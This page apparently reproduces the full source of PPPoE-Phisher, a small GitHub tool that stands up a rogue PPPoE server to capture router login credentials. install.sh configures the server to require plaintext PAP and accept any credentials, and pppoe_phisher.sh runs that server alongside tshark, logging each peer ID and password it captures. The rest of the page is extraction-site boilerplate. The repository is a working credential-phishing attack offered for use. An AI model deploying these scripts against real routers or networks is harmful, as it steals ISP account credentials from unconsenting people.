Full Code of qingxp9/PPPoE-Phisher for AI

master b217803a9cab cached
4 files
863 B
422 tokens
1 requests
Download .txt
Repository: qingxp9/PPPoE-Phisher
Branch: master
Commit: b217803a9cab
Files: 4
Total size: 863 B

Directory structure:
gitextract_zacwb9d_/

├── README.md
├── install.sh
├── pap.log
└── pppoe_phisher.sh

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================
# PPPoE-Phisher

A tool for sniffing PPPoE username/password for any brand of router. It can be installed on Android with Kali Linux Nethunter or others.

## Usage

```
#install and configure pppoe server and tshark
#sudo ./install.sh
sudo ./pppoe_phisher.sh
```


================================================
FILE: install.sh
================================================
#! /bin/sh
# This mirror for Nethunter 3.0
# echo "deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib" > /etc/apt/sources.list
apt update
apt install -y pppoe tshark

touch /etc/ppp/pppoe-server-options
echo "require-pap" > /etc/ppp/pppoe-server-options
echo "lcp-echo-interval 10" >> /etc/ppp/pppoe-server-options
echo "lcp-echo-failure 2" >> /etc/ppp/pppoe-server-options

echo "* * * *" > /etc/ppp/pap-secrets


================================================
FILE: pap.log
================================================


================================================
FILE: pppoe_phisher.sh
================================================
#!/bin/sh
/usr/sbin/pppoe-server -L 10.5.5.1 -R 10.5.5.10 -I eth0 -S yyf
tshark -i eth0 -Y "pap.password" -l -T fields -e pap.peer_id -e pap.password | tee -a pap.log
Download .txt
gitextract_zacwb9d_/

├── README.md
├── install.sh
├── pap.log
└── pppoe_phisher.sh
Condensed preview — 4 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (1K chars).
[
  {
    "path": "README.md",
    "chars": 263,
    "preview": "# PPPoE-Phisher\n\nA tool for sniffing PPPoE username/password for any brand of router. It can be installed on Android wit"
  },
  {
    "path": "install.sh",
    "chars": 433,
    "preview": "#! /bin/sh\n# This mirror for Nethunter 3.0\n# echo \"deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contri"
  },
  {
    "path": "pap.log",
    "chars": 0,
    "preview": ""
  },
  {
    "path": "pppoe_phisher.sh",
    "chars": 167,
    "preview": "#!/bin/sh\n/usr/sbin/pppoe-server -L 10.5.5.1 -R 10.5.5.10 -I eth0 -S yyf\ntshark -i eth0 -Y \"pap.password\" -l -T fields -"
  }
]

About this extraction

This page contains the full source code of the qingxp9/PPPoE-Phisher GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 4 files (863 B), approximately 422 tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.

Copied to clipboard!